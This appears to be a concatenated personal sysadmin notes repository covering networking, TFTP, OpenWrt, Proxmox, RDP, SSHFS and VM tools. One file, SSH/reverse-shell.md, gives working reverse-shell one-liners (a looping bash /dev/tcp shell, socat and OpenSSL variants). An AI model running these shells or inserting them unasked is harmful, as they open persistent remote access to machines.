10 | 11 | ### Class B 12 | 172.16.0.0 - 172.31.255.255 13 | CIDR Notation: /12 14 | Netmask: 255.240.0.0 15 | Number of Addresses: 1,048,576 16 | Use Case: Medium-sized networks 17 | 18 | ### Class C 19 | 192.168.0.0 - 192.168.255.255 20 | CIDR Notation: /16 21 | Netmask: 255.255.0.0 22 | Number of Addresses: 65,536 23 | Use Case: Small networks. -------------------------------------------------------------------------------- /Networks/mDNS.md: -------------------------------------------------------------------------------- 1 | # Multicast DNS 2 | 3 | --- 4 | 5 | ## Approach 1: Avahi (Most Common & Cross-Distro) 6 | 7 | ### A. Installation: 8 | 9 | #### 1. Debian/Ubuntu: 10 | ```bash 11 | sudo apt update 12 | sudo apt install -y avahi-daemon avahi-utils 13 | ``` 14 | 15 | #### 2. RHEL/Fedora/CentOS: 16 | ```bash 17 | sudo dnf install -y avahi avahi-tools 18 | ``` 19 | 20 | ### B. Configuration: 21 | 22 | #### 1. Enable and start the service: 23 | ```bash 24 | sudo systemctl enable avahi-daemon 25 | sudo systemctl start avahi-daemon 26 | ``` 27 | 28 | #### 2. Edit `/etc/avahi/avahi-daemon.conf` if customization is needed. Example (optional): 29 | ```bash 30 | [server] 31 | use-ipv4=yes 32 | use-ipv6=no 33 | ``` 34 | 35 | To advertise services, use .service files in `/etc/avahi/services/`. 36 | 37 | ### C. Verification: 38 | ```bash 39 | # Ping 40 | ping hostname.local 41 | 42 | # Or 43 | avahi-browse -a 44 | ``` 45 | 46 | --- 47 | 48 | ## Approach 2: systemd-resolved (Modern, Native to systemd) 49 | 50 | > [!IMPORTANT] 51 | > These instructions predate recent systemd changes: the 52 | > `systemd-resolve` command has been renamed to `resolvectl`, 53 | > and `resolvectl` does not support `--set-mdns=yes` 54 | > (on newer systems use `resolvectl mdns <interface> yes` instead) 55 | 56 | Supported on: Debian 9+, Ubuntu 16.10+, Fedora 33+, RHEL 8+ 57 | 58 | ### A. Installation: 59 | Usually preinstalled with systemd. 60 | 61 | ### B. Enable mDNS in systemd-resolved: 62 | 63 | 1.
Edit or create `/etc/systemd/resolved.conf`: 64 | 65 | ```bash 66 | [Resolve] 67 | MulticastDNS=yes 68 | ``` 69 | 2. Make sure `/etc/nsswitch.conf` includes mdns: 70 | ``` 71 | hosts: files mdns4_minimal [NOTFOUND=return] dns 72 | ``` 73 | 74 | 3. Enable on a link: `sudo systemd-resolve --set-mdns=yes --interface=<interface>` 75 | 76 | 4. Then run `sudo systemctl restart systemd-resolved` 77 | 78 | 5. Based on your firewall, make sure that UDP port `5353` (mDNS) is open. LLMNR, also handled by systemd-resolved, additionally uses UDP/TCP port `5355`. 79 | 80 | ### C. Verification: 81 | 82 | On the host 83 | ``` 84 | sudo systemd-resolve --status 85 | ``` 86 | 87 | On the client: 88 | ``` 89 | ping hostname.local 90 | ``` 91 | 92 | No extra daemons or tools are required if you only want basic mDNS resolution. -------------------------------------------------------------------------------- /Networks/openwrt/README.md: -------------------------------------------------------------------------------- 1 | # OpenWrt 2 | 3 | ## 🔗 List of compatible devices 4 | Find the [list](https://openwrt.org/toh/start) of compatible devices. 5 | 6 | ## 📙 Defaults 7 | ### A. Credentials 8 | Username: `root` 9 | Password: none (blank by default; set one with `passwd` on first login) 10 | 11 | ### B. Gateway IP 12 | `192.168.1.1` 13 | 14 | --- 15 | 16 | ## 🚩 Common Issues 17 | 18 | ### 1. SSH connection error 19 | If this error appears during an SSH connection: 20 | ```bash 21 | Unable to negotiate with 192.168.0.1 port 22: no matching host key type found. Their offer: ssh-rsa 22 | ``` 23 | 24 | This error occurs because recent OpenSSH clients have disabled the older ssh-rsa algorithm (which uses SHA-1) by default for security reasons. 25 | 26 | As a workaround, temporarily accept the ssh-rsa algorithm for this connection: 27 | 28 | ```bash 29 | ssh -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedAlgorithms=+ssh-rsa root@192.168.0.1 30 | ``` 31 | 32 | If you frequently connect to this device, include these lines in your `~/.ssh/config` file.
33 | 34 | ```bash 35 | Host 192.168.0.1 36 | HostKeyAlgorithms +ssh-rsa 37 | PubkeyAcceptedAlgorithms +ssh-rsa 38 | ``` -------------------------------------------------------------------------------- /Networks/packet-capture.md: -------------------------------------------------------------------------------- 1 | # Packet Capture 2 | 3 | ## Tools 4 | ### Capture packets via: 5 | 1. Wireshark 6 | 2. tcpdump (Linux/Mac) 7 | 3. netsh (Windows) 8 | 4. tshark (Linux/Mac) 9 | 10 | ### Analysis tools 11 | 1. Teleseer 12 | 13 | ## Wireshark 14 | Remember to enable [x] `Enable promiscuous mode on all interfaces` 15 | 16 | ## Methods to capture packets 17 | ### 1. Use software from a device connected to the network 18 | 19 | ### 2. Use a SPAN port 20 | A SPAN port is a managed switch port that mirrors all the traffic from all other interfaces. 21 | 22 | Characteristics: 23 | 1. Captures packets from all devices connected to the switch 24 | 2. We need to have physical access 25 | 3. We need a managed switch 26 | 4. For high throughput/bandwidth we need a switch that can handle the processing and will not drop packets 27 | 28 | ### 3. Using a network TAP (Test Access Point) 29 | A network device that creates a copy of every packet transmitted. It is connected between the router and the switch. 30 | 31 | ```mermaid 32 | graph LR 33 | 34 | router --> TAP --> Switch --> Devices 35 | ``` -------------------------------------------------------------------------------- /Networks/protocols/tftp.md: -------------------------------------------------------------------------------- 1 | # Trivial File Transfer Protocol (TFTP) 2 | 3 | > [!NOTE] 4 | > The **tftp** protocol typically operates on Port: **69** and uses **UDP** 5 | 6 | ## 1. Install both server and client 7 | ```bash 8 | sudo apt update 9 | sudo apt install tftpd-hpa tftp-hpa 10 | ``` 11 | 12 | ## 2.
Configure the tftp server (daemon) 13 | ```bash 14 | sudo nano /etc/default/tftpd-hpa 15 | ``` 16 | 17 | It should contain something like: 18 | ```bash 19 | TFTP_USERNAME="tftp" 20 | TFTP_DIRECTORY="/srv/tftp" 21 | TFTP_ADDRESS="192.168.0.66:69" 22 | TFTP_OPTIONS="--secure --verbose" 23 | ``` 24 | Where: 25 | - **TFTP_USERNAME**: The user under which the service runs. 26 | - **TFTP_DIRECTORY**: The directory that will serve as the root for TFTP transfers (make sure this directory exists). 27 | - **TFTP_ADDRESS**: The IP and port (UDP port 69 is standard for TFTP). 28 | - **TFTP_OPTIONS**: The --secure option restricts file access to the TFTP_DIRECTORY. 29 | 30 | *If the directory **TFTP_DIRECTORY** doesn’t exist, create it:* 31 | ```bash 32 | sudo mkdir -p /srv/tftp 33 | sudo chown -R tftp:tftp /srv/tftp 34 | ``` 35 | 36 | ## 3. Ensure Operation 37 | ```bash 38 | # Restart the TFTP service 39 | sudo systemctl restart tftpd-hpa 40 | 41 | # Check the status of the TFTP service 42 | sudo systemctl status tftpd-hpa 43 | 44 | # Confirm that it's listening on the correct IP 45 | sudo netstat -ulnp | grep tftp 46 | ``` 47 | 48 | ## 4. Firewall 49 | Make sure that your firewall allows connections 50 | ### 4a. Ubuntu-based 51 | ```bash 52 | sudo ufw allow 69/udp 53 | ``` 54 | 55 | ## 5. Verification 56 | To verify that both the server and the client work: 57 | 58 | 1. Add files in the **TFTP_DIRECTORY** dir. 59 | 2. Run `tftp 192.168.0.66` 60 | 3. Execute: 61 | ```bash 62 | verbose on 63 | mode binary 64 | status 65 | get <filename> 66 | ``` 67 | 4. Make sure that you can receive the file 68 | 69 | ## 6.
Server logs 70 | To view server logs run: 71 | 72 | ### Using syslog 73 | ```bash 74 | sudo tail -f /var/log/syslog | grep tftpd 75 | ``` 76 | 77 | ### Using journalctl (if tftpd-hpa is managed by systemd) 78 | ```bash 79 | sudo journalctl -u tftpd-hpa -f 80 | ``` -------------------------------------------------------------------------------- /Networks/static-ip.md: -------------------------------------------------------------------------------- 1 | # Static IP 2 | One of the ways to set a static IP is using `network-manager`. Hence, from a Debian-based machine follow these steps: 3 | 4 | 1. You need netplan support. 5 | 6 | 2. Install network manager 7 | `sudo apt install network-manager` 8 | 9 | 3. Run `ip link show` to find the desired interface. 10 | 11 | 4. Create the file `/etc/netplan/01-anyname.yaml` (`sudo nano /etc/netplan/01-anyname.yaml`) and store the contents below inside it 12 | 13 | ``` 14 | network: 15 | version: 2 16 | renderer: NetworkManager 17 | ethernets: 18 | <interface>: 19 | dhcp4: no 20 | addresses: [<static-ip>/24] 21 | routes: 22 | - to: default 23 | via: <gateway-ip> 24 | nameservers: 25 | addresses: [8.8.8.8,8.8.4.4] 26 | ``` 27 | 5. Then run: 28 | `sudo netplan try` 29 | 30 | 6. To disable another link run: 31 | `sudo ip link set [Interface name] down` -------------------------------------------------------------------------------- /Nginx-Proxy-Manager/README.md: -------------------------------------------------------------------------------- 1 | # Nginx Proxy Manager 2 | 3 | 1. Set up SSL 4 | Add both the root domain and subdomains 5 | ![NGX SSL](./doc/npm-ssl.png) 6 | 7 | 2.
Add proxies 8 | ![NGX Proxy](./doc/npm-proxy.png) 9 | -------------------------------------------------------------------------------- /Nginx-Proxy-Manager/doc/npm-proxy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CSpyridakis/notes/a51682b5510bc694537a0e1f12914f36d2a3a2a2/Nginx-Proxy-Manager/doc/npm-proxy.png -------------------------------------------------------------------------------- /Nginx-Proxy-Manager/doc/npm-ssl.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CSpyridakis/notes/a51682b5510bc694537a0e1f12914f36d2a3a2a2/Nginx-Proxy-Manager/doc/npm-ssl.png -------------------------------------------------------------------------------- /Proxmox/Portainer.md: -------------------------------------------------------------------------------- 1 | # Portainer 2 | 3 | ## Installation 4 | See: 5 | https://community-scripts.github.io/ProxmoxVE/scripts?id=docker 6 | https://www.youtube.com/watch?v=S8WCtqTMeO8 7 | 8 | 1. Open Proxmox Shell and run: 9 | ``` 10 | bash -c "$(wget -qLO - https://github.com/community-scripts/ProxmoxVE/raw/main/ct/docker.sh)" 11 | ``` 12 | ## Settings: 13 | * a. Use advanced settings 14 | * b. Distribution: ubuntu 15 | * c. Ubuntu version: 22.04 Jammy 16 | * d. Container type: Unprivileged 17 | * e. Hostname: portainer 18 | 19 | 2. Open Portainer shell and run 20 | ``` 21 | bash -c "$(wget -qLO - https://github.com/community-scripts/ProxmoxVE/raw/main/ct/docker.sh)" 22 | ``` 23 | 24 | ### Reboot Portainer twice a day 25 | 26 | 1. Create a new cron job: `crontab -e` 27 | 2. 
`0 0,12 * * * pct stop [VMID] && pct start [VMID]`, where `VMID` is the ID of your LXC container -------------------------------------------------------------------------------- /Proxmox/README.md: -------------------------------------------------------------------------------- 1 | # Proxmox VE (PVE) 2 | 3 | A powerful open-source hypervisor for managing Virtual Machines (VMs) and LXC Linux Containers (CTs). 4 | 5 | **Support:** 6 | - [Proxmox Wiki](https://pve.proxmox.com/wiki) 7 | - [Proxmox Community Forum](https://forum.proxmox.com) 8 | 9 | **Great learning resources** 10 | - [Learn Linux TV](https://www.youtube.com/playlist?list=PLT98CRl2KxKHnlbYhtABg6cF50bYa8Ulo) 11 | 12 | **Installation** 13 | For Installation related topics read [this](./installation.md). 14 | 15 | **Post-Installation** 16 | For Post-Installation related topics read [this](./post-installation.md). 17 | 18 | **User Management** 19 | For User Management related topics read [this](./user-management.md). 20 | 21 | **Create VM/CT** 22 | 23 | - To create a VM read [this](./create-VM.md). 24 | - To create a CT read [this](./create-CT.md). 25 | 26 | **Templates** 27 | 28 | To create VM templates to standardize VM creation and reduce setup time read [this](./create-VM-template.md). 29 | 30 | To use CT templates for lightweight, fast deployment of containerized environments read [this](./create-CT-template.md). 31 | 32 | **CLI** 33 | To manage VMs/CTs from the CLI read [this](./cli.md). 34 | 35 | **Firewall** 36 | For Firewall related topics read [this](./firewall.md). 37 | 38 | **Networking** 39 | For Networking related topics read [this](./networking.md). 40 | 41 | **Storage** 42 | For Storage related topics read [this](./storage.md). 43 | 44 | **Backup & Snapshots** 45 | For Backup & Snapshots related topics read [this](./backup-and-snapshots.md). 46 | 47 | **Clustering** 48 | 49 | For Clustering related topics read [this](./clustering.md).
50 | 51 | **High Availability** 52 | For High Availability related topics read [this](./high-availability.md). 53 | -------------------------------------------------------------------------------- /Proxmox/create-CT-template.md: -------------------------------------------------------------------------------- 1 | # Create a CT template 2 | 3 | ## 1. Prepare CT 4 | 5 | Remove Unique System Identifiers. SSH host keys and machine-id are unique to each system. 6 | If left unchanged: 7 | 8 | - All CTs cloned from the template will share the same identity, which poses security risks and causes networking conflicts. 9 | - SSH connections may raise security warnings due to reused host keys. 10 | 11 | ### For Debian-based systems: 12 | ```bash 13 | # Make sure that the system is updated 14 | sudo apt update -y 15 | sudo apt dist-upgrade -y # Optional 16 | 17 | # Remove existing SSH host keys (they will be regenerated on first boot) 18 | sudo rm -rf /etc/ssh/ssh_host_* 19 | 20 | # Clear machine-id (should be empty) 21 | sudo truncate -s 0 /etc/machine-id 22 | 23 | # Ensure /var/lib/dbus/machine-id is a symlink to /etc/machine-id 24 | # sudo ln -sf /etc/machine-id /var/lib/dbus/machine-id 25 | 26 | # Make sure that /var/lib/dbus/machine-id is a symlink of /etc/machine-id 27 | ls -l /var/lib/dbus/machine-id 28 | 29 | # Make sure that /etc/machine-id is empty 30 | cat /etc/machine-id 31 | 32 | # Clean up unnecessary packages and cached files 33 | sudo apt clean 34 | sudo apt autoremove 35 | 36 | # Power off the CT 37 | sudo poweroff 38 | ``` 39 | 40 | ## 2. Convert the CT to a Template 41 | Right-click the powered-off CT > Select `Convert to Template`. 42 | 43 | ## 3. Create a CT from the Template 44 | 45 | 1. Right-click on the Template. 46 | 2. Select Clone. 47 | 3. Set the following: 48 | - **Mode**: Full Clone (recommended to make a complete copy) 49 | - Assign CT ID, Hostname, and Target Node 50 | 4. Click Clone 51 | 52 | 53 | ## 4.
Regenerate SSH keys 54 | Connect to the CT and run the following commands: 55 | 56 | ``` 57 | sudo rm -rf /etc/ssh/ssh_host_* 58 | sudo dpkg-reconfigure openssh-server 59 | ``` -------------------------------------------------------------------------------- /Proxmox/firewall.md: -------------------------------------------------------------------------------- 1 | # Firewall 2 | 3 | Different Firewall levels 4 | - Datacenter 5 | - Node 6 | - VM/CT 7 | 8 | > [!IMPORTANT] 9 | > For rules at a given level to take effect, the firewall must be enabled at that level! 10 | 11 | Default Interface: `vmbr0` 12 | 13 | > [!CAUTION] 14 | > If the Datacenter firewall rules are not set properly, access to the Proxmox web UI can break. 15 | > 16 | > E.g. by enabling the Datacenter firewall without adding rules 17 | > 18 | > To fix this issue (if it happens): 19 | > 1. Connect via CLI 20 | > 2. Edit `/etc/pve/firewall/cluster.fw`. Set `enable: 0` 21 | > 22 | > To prevent it, add a Datacenter Rule: 23 | > - `Direction`: In 24 | > - `Action`: ACCEPT 25 | > - `Interface`: Give your interface 26 | > - `Enable`: [x] 27 | > - `Protocol`: tcp 28 | > - `Dest. port`: 8006 29 | 30 | > [!TIP] 31 | > You may also want to allow the ICMP protocol at the Datacenter level, so that you can ping the server.
32 | > - `Direction`: In 33 | > - `Action`: ACCEPT 34 | > - `Interface`: Give your interface 35 | > - `Enable`: [x] 36 | > - `Protocol`: icmp 37 | 38 | ## Add rule 39 | Select the component (Datacenter, Node or VM/CT) > `Firewall` > `Add` 40 | - `Direction`: In, Out, or Forward 41 | - `Action`: ACCEPT, REJECT or DROP 42 | - `Interface`: The target interface 43 | - `Enable`: Whether the rule is enabled 44 | - `Protocol`: Protocols like tcp, udp, icmp 45 | - `Macro`: Predefined macros like SSH 46 | - `Source`: Use CIDR format (/32 for a single IP) 47 | 48 | ## Enable/Disable Firewall 49 | Select the component (Datacenter, Node or VM/CT) > `Firewall` > `Options` > `Firewall` > `Edit` > Set to on/off -------------------------------------------------------------------------------- /Proxmox/high-availability.md: -------------------------------------------------------------------------------- 1 | # High availability 2 | 3 | High availability in a nutshell: 4 | 5 | If a Node goes down --> The VMs/CTs will automatically start on another Node. 6 | 7 | > [!IMPORTANT] 8 | > In order to have High availability, at **least** 3 servers are required! 9 | 10 | **How does it work?** 11 | Health checks are sent periodically, and if a server becomes unreachable, the other servers take over its workload. 12 | 13 | ## Enable HA for a VM 1. Make sure that the target VM uses shared storage for its disk (read [this](./clustering.md#enable-shared-storage)). 15 | 2. Shut down the VM 16 | 3. `Datacenter` > `HA` > `Add` 17 | - `VM`: Select target VM -------------------------------------------------------------------------------- /Proxmox/installation.md: -------------------------------------------------------------------------------- 1 | # Installation 2 | 3 | ## 1. Target Hard Disk 4 | During installation, click on `Options` to customize the `filesystem` (e.g., **ZFS**) and set up any required **RAID** configuration. 5 | 6 | > [!NOTE] 7 | > **ZFS** is recommended if the system has more than 32GB of RAM.
8 | > It is ideal for production environments and systems requiring high performance. 9 | > 10 | > - ZFS is memory-intensive (recommended: 1 GB RAM per 1 TB of storage). 11 | > - Mixing disk sizes or replacing drives requires careful planning. 12 | > - Avoid using hardware RAID with ZFS — use ZFS-native RAID-Z instead. 13 | 14 | ## 2. Administration 15 | Specify an email address for receiving system notifications and alerts. 16 | 17 | ## 3. Network Configuration 18 | - **Hostname**: The name of the Proxmox server. 19 | - **IP Address**: Assign a static IP address outside of the router's DHCP range. 20 | 21 | ## 4. Web Access 22 | After installation, access the Proxmox Web GUI: 23 | 24 | `http://<server-ip>:8006` 25 | 26 | **Default Credentials:** 27 | - **Username**: `root` 28 | - **Password**: Set during installation 29 | -------------------------------------------------------------------------------- /Proxmox/post-installation.md: -------------------------------------------------------------------------------- 1 | # Post Installation 2 | 3 | ## Update Node 4 | 1. Select the node (top left panel). 5 | 2. Go to `Updates` > `Refresh`. 6 | 7 | ## Upgrade Node 8 | 1. `Updates` > `Refresh` 9 | 2. `Updates` > `Upgrade` 10 | 3. `Updates` > `Refresh` 11 | 4. Reboot the node. 12 | 13 | ## Subscription Repository 14 | If you don't plan to purchase a subscription: 15 | 16 | 1. Go to `Updates` > `Repositories` > `Add`. 17 | 2. Select `No-subscription` repository > `Add`. 18 | 3. [Upgrade node](#upgrade-node). 19 | 20 | If you do have a subscription: 21 | - Select the node > `Subscription` > `Upload Subscription Key`. 22 | -------------------------------------------------------------------------------- /Proxmox/storage.md: -------------------------------------------------------------------------------- 1 | # Storage 2 | 3 | In Proxmox you can mount storage from remote servers (**shared storage**) to share resources.
4 | 5 | 6 | > [!NOTE] 7 | > Since Proxmox runs on top of Linux, you can use **samba** or **NFS**. 8 | 9 | --- 10 | 11 | ## Target 12 | 13 | We can create [NFS](https://en.wikipedia.org/wiki/Network_File_System) network storage using a platform such as: 14 | - Synology 15 | - TrueNAS 16 | - etc. 17 | 18 | Then, mount the storage in Proxmox. 19 | 20 | --- 21 | 22 | ## Use Case 23 | 24 | We can use this approach to store files related to: 25 | - **Shared Storage** (High Availability) 26 | - **Back-ups** (Disaster recovery) 27 | 28 | > [!NOTE] 29 | > Keep in mind that, in most cases, backups occur occasionally, while shared storage is continuously used. 30 | > 31 | > Therefore, having a high-speed connection between your Proxmox nodes and the shared storage is essential for optimal performance. 32 | > 33 | > Consider using 10 GbE connections instead of standard Gigabit Ethernet, especially if you're working with high-throughput workloads or fast storage that should be accessible from multiple VMs. 34 | 35 | --- 36 | 37 | ### Connect NFS to the Datacenter 38 | 39 | As a prerequisite, you must already have an NFS share available in your network. 40 | 41 | > [!IMPORTANT] 42 | > Make sure that the NFS export on the server can be accessed by the **root** user.
43 | 44 | `Datacenter` > `Storage` > `Add` > `NFS` 45 | - `ID`: A name for this share 46 | - `Server`: IP or Domain 47 | - `Export`: Server share dir full path 48 | - `Content`: What we plan to store there 49 | - For **Backups** select: `Disk image`, `Container template`, `Backup` and `Snippets` 50 | - For **Shared Storage** select: `Disk image`, `Container template` and `Container` 51 | 52 | -------------------------------------------------------------------------------- /RDP/README.md: -------------------------------------------------------------------------------- 1 | # Remote Desktop Protocol 2 | 3 | See [https://www.digitalocean.com/community/tutorials/how-to-enable-remote-desktop-protocol-using-xrdp-on-ubuntu-22-04](https://www.digitalocean.com/community/tutorials/how-to-enable-remote-desktop-protocol-using-xrdp-on-ubuntu-22-04) 4 | for more details. 5 | 6 | Installation: 7 | ``` 8 | sudo apt update 9 | 10 | # Installing a Desktop Environment on Ubuntu 11 | sudo apt install xfce4 xfce4-goodies -y 12 | 13 | # Installing xrdp on Ubuntu 14 | sudo apt install xrdp -y 15 | 16 | # Make sure that it is running 17 | sudo systemctl status xrdp 18 | ``` 19 | 20 | Make sure that the firewall allows the port that RDP uses (3389/TCP by default). 21 | 22 | Now log out from your main session and connect via Remmina or another RDP client. -------------------------------------------------------------------------------- /RDP/Rustdesk.md: -------------------------------------------------------------------------------- 1 | # Rustdesk 2 | 3 | RustDesk is a free, open-source remote desktop application that allows users to access and control computers remotely. 4 | 5 | Download Rustdesk from [here](https://github.com/rustdesk/rustdesk/releases/tag/1.3.9) 6 | 7 | ## Internal LAN access 8 | Make sure that you have enabled the following setting.
`Settings` > `Security` > `Security` > [x] `Enable direct IP access` 10 | 11 | ## Login screen 12 | Based on [this](https://rustdesk.com/docs/en/client/linux/#login-screen), Wayland is not supported. 13 | Hence, **uncomment** `WaylandEnable=false` in `/etc/gdm/custom.conf` or `/etc/gdm3/custom.conf`, then reboot. -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Notes 2 | 3 | ## 🗒️ General Notes 4 | This repository contains a personal collection of notes and scripts, collected over the years, regarding different technologies and tools. 5 | 6 | ## 💡 Purpose 7 | The idea is to solve each problem once and minimize the time spent, or automate the process, of resolving the same problem in the future. 8 | 9 | ## 💬 What should I expect? 10 | Documentation about different technologies. For example, notes regarding different programming languages, such as [Rust](./Rust/), are available. There are also notes related to [Linux](./Linux/), [Debian](./Debian/), and even [SSH](./SSH/). 11 | 12 | Navigate to the different directories or search for keywords to find solutions or guidance on a given task. 13 | 14 | ## ❓ After that? 15 | If you have any further questions or need help with another topic, feel free to create a pull request. 16 | 17 | > [!NOTE] 18 | > TODO: Create an index for future expansion 19 | -------------------------------------------------------------------------------- /SSH/reverse-shell.md: -------------------------------------------------------------------------------- 1 | # Reverse shell 2 | 3 | > [!WARNING] 4 | > Use a reverse shell only on systems that you have explicit authorization to access. 5 | 6 | ## 1. Using Bash 7 | **Listener** (the machine that will receive the shell connection) 8 | ```bash 9 | nc -lvnp <port> 10 | ``` 11 | 12 | From the **target** machine run one of the commands based on the use case. 13 | 14 | 1.
Terminal 15 | ```bash 16 | while true; do bash -c "/bin/bash -i >& /dev/tcp/<listener-ip>/<port> 0>&1" ; sleep 5 ; done 17 | ``` 18 | 19 | ## 2. Socat [Preferred] 20 | Reverse Shell with socat (recommended for stability). Socat is very reliable and supports full TTY and encryption (TLS) if needed. 21 | 22 | Installation 23 | ``` 24 | sudo apt install socat 25 | ``` 26 | 27 | On the **listener**: 28 | ``` 29 | socat file:`tty`,raw,echo=0 tcp-listen:<port>,reuseaddr 30 | ``` 31 | 32 | On the **target** (your device): 33 | ``` 34 | socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<listener-ip>:<port> 35 | ``` 36 | 37 | > [!CAUTION] 38 | > **DO NOT FORGET TO CONFIGURE YOUR FIREWALL TO ACCEPT TRAFFIC ON THE SPECIFIED PORT!** 39 | 40 | ### How to add encryption: 41 | **Listener** 42 | ```bash 43 | # Create certificate 44 | openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out cert.pem 45 | cat key.pem cert.pem > fullchain.pem 46 | 47 | # Start listener 48 | socat openssl-listen:<port>,reuseaddr,fork,cert=cert.pem,key=key.pem,cafile=cert.pem,verify=0 file:`tty`,raw,echo=0 49 | ``` 50 | 51 | **Target** 52 | ```bash 53 | socat openssl-connect:<listener-ip>:<port>,verify=0 exec:'bash -li',pty,stderr,setsid,sigint,sane 54 | ``` 55 | 56 | ## 3. OpenSSL 57 | A bit more complex but adds encryption. 58 | 59 | On the **listener**: 60 | ``` 61 | openssl req -new -x509 -days 365 -nodes -out cert.pem -keyout cert.pem 62 | openssl s_server -quiet -key cert.pem -cert cert.pem -port <port> 63 | ``` 64 | 65 | On the **target**: 66 | ``` 67 | mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <listener-ip>:<port> > /tmp/s 68 | ``` -------------------------------------------------------------------------------- /SSH/sshfs.md: -------------------------------------------------------------------------------- 1 | # SSHFS 2 | 3 | **SSHFS** stands for **SSH Filesystem** and it lets you mount a remote filesystem over **SSH** on your local machine as if it were a local folder.
4 | 5 | It’s part of **FUSE** **(Filesystem in Userspace)**, meaning you don't need kernel-level access, just a user with SSH access to the remote system. 6 | 7 | With **SSHFS**, you can browse, open, and edit files on a remote server securely over SSH as if they were on your local computer. 8 | 9 | Key Features 10 | 11 | - Secure (uses SSH encryption). 12 | - Lightweight and easy to set up. 13 | - No need for Samba, NFS, or FTP servers. 14 | - Read/write access (if permissions allow). 15 | - Great for development, backups, or remote file management. 16 | 17 | ## Installation 18 | 19 | Debian 20 | ```bash 21 | sudo apt install sshfs 22 | ``` 23 | 24 | Red Hat 25 | ```bash 26 | sudo dnf install sshfs 27 | ``` 28 | 29 | ## Mount 30 | ```bash 31 | sshfs <user>@<host>:<remote-dir> <local-mountpoint> 32 | ``` 33 | 34 | ### If there are errors 35 | #### Step 1. 36 | Make sure that the fuse group exists and that your user is part of it 37 | ``` 38 | sudo groupadd fuse 39 | sudo usermod -aG fuse $USER 40 | ``` 41 | 42 | #### Step 2. 43 | Update the configuration 44 | Edit `/etc/fuse.conf` (e.g., `sudo vim /etc/fuse.conf`) and uncomment the `user_allow_other` option. 45 | 46 | #### Step 3 47 | Try using the `allow_other` option. 48 | ```bash 49 | sshfs -o allow_other,uid=$(id -u),gid=$(id -g) \ 50 | <user>@<host>:<remote-dir> <local-mountpoint> 51 | ``` 52 | 53 | \* See this [url](https://askubuntu.com/questions/123215/sshfs-is-mounting-filesystems-as-another-user) 54 | 55 | #### Step 4 56 | Troubleshoot 57 | 58 | ```bash 59 | sshfs -o allow_other,debug,sshfs_debug,loglevel=debug,uid=$(id -u),gid=$(id -g) \ 60 | <user>@<host>:<remote-dir> <local-mountpoint> 61 | ``` 62 | 63 | ## Verify 64 | ```bash 65 | mount 66 | ``` 67 | 68 | ## Unmount 69 | ```bash 70 | umount <local-mountpoint> 71 | # or preferred for this 72 | fusermount -u <local-mountpoint> 73 | ``` -------------------------------------------------------------------------------- /Virtualization/Gnome-boxes/README.md: -------------------------------------------------------------------------------- 1 | # Gnome boxes 2 | 3 | **GNOME Boxes** is a simple VM management application designed for GNOME desktop environments.

It lets you **easily** create, access, and manage VMs or remote desktops with a modern, user-friendly GUI.

Think of it as a **lightweight** alternative to VirtualBox or virt-manager, especially suited for beginners and casual users.

## Installation

### Debian
```bash
sudo apt install gnome-boxes
```

### Red Hat
```bash
sudo dnf install gnome-boxes
```

## Under the Hood
| Component | Purpose |
| --------- | ------- |
| libvirt | Provides VM lifecycle management |
| QEMU/KVM | Runs the actual VMs |
| SPICE/VNC | Enables remote desktop protocols |
| `.iso` images | Used to install the guest OS |
-------------------------------------------------------------------------------- /Virtualization/Multipass/README.md: --------------------------------------------------------------------------------
# Multipass
**Multipass** is a lightweight VM manager developed by Canonical, designed to quickly launch and manage Ubuntu VMs on your local machine.

It’s like a super-simplified alternative to tools like **VirtualBox**, **Docker**, or **Vagrant**, but focused specifically on Ubuntu images.

## Installation

```bash
sudo snap install multipass
```

## Common Commands

| Command | Description | Example |
|---------|-------------|---------|
| `multipass find` | List all available Ubuntu images | `multipass find` |
| `multipass launch <image> -c <cpus> -d <disk> -m <memory> -n <name>` | Launch a new instance with specified resources and name | `multipass launch 22.04 -c 2 -m 2G -d 10G -n my-vm` |
| `multipass list` | Show all instances and their current status | `multipass list` |
| `multipass info <name>` | Show detailed information about a specific instance | `multipass info my-vm` |
| `multipass shell <name>` | Open an interactive shell inside the instance | `multipass shell my-vm` |
| `multipass exec <name> -- <command>` | Run a command inside the instance from the host | `multipass exec my-vm -- ls /home/ubuntu` |
| `multipass stop <name>` | Stop a running instance | `multipass stop my-vm` |
| `multipass start <name>` | Start a stopped instance | `multipass start my-vm` |
| `multipass delete <name>` | Delete a stopped instance | `multipass delete my-vm` |
| `multipass purge` | Remove all deleted instances and reclaim disk space | `multipass purge` |
| `multipass set <key>=<value>` | Set configuration options for Multipass | `multipass set local.driver=qemu` |

---

## Known issues
```
ERROR: ld.so: object 'libgtk3-nocsd.so.0' from LD_PRELOAD cannot be preloaded (failed to map segment from shared object): ignored.
```

\* libgtk3-nocsd is commonly used to disable client-side decorations (CSD) in GTK3 applications, forcing them to use traditional window manager decorations.
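
Instead of provisioning an instance by hand with `multipass exec`, it can be bootstrapped at launch time with a cloud-init file via the `--cloud-init` flag. A minimal sketch; the file name `dev-init.yaml`, the package list, and the marker file are illustrative:

```yaml
#cloud-config
# Runs on the instance's first boot: install packages, then drop a marker file.
packages:
  - git
  - htop
runcmd:
  - echo "provisioned by cloud-init" > /home/ubuntu/provisioned.txt
```

Pass it when creating the instance: `multipass launch 22.04 -n dev-vm --cloud-init dev-init.yaml`.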
-------------------------------------------------------------------------------- /Web/CSS.md: --------------------------------------------------------------------------------
# CSS

## Spacing
```mermaid
%%{init: {'theme':'neutral'}}%%
flowchart LR
    subgraph Margin
        subgraph Border
            subgraph Padding
                Content
                style Content fill:#def2d6
            end
            style Padding fill:#f7f2d5
        end
        style Border fill:#507489
    end
    style Margin fill:#fdb31c
```
-------------------------------------------------------------------------------- /Web/server/static-demo-website/css/style.css: --------------------------------------------------------------------------------
body {
  font-family: "Roboto", sans-serif;
  margin: 0;
  padding: 0;
  background: #f9f9f9;
  color: #333;
}
header {
  background: linear-gradient(90deg, #6a11cb, #2575fc);
  color: #fff;
  padding: 20px;
  text-align: center;
}
header h1 {
  margin: 0;
  font-size: 2.5rem;
}
main {
  padding: 20px;
  display: flex;
  flex-direction: column;
  align-items: center;
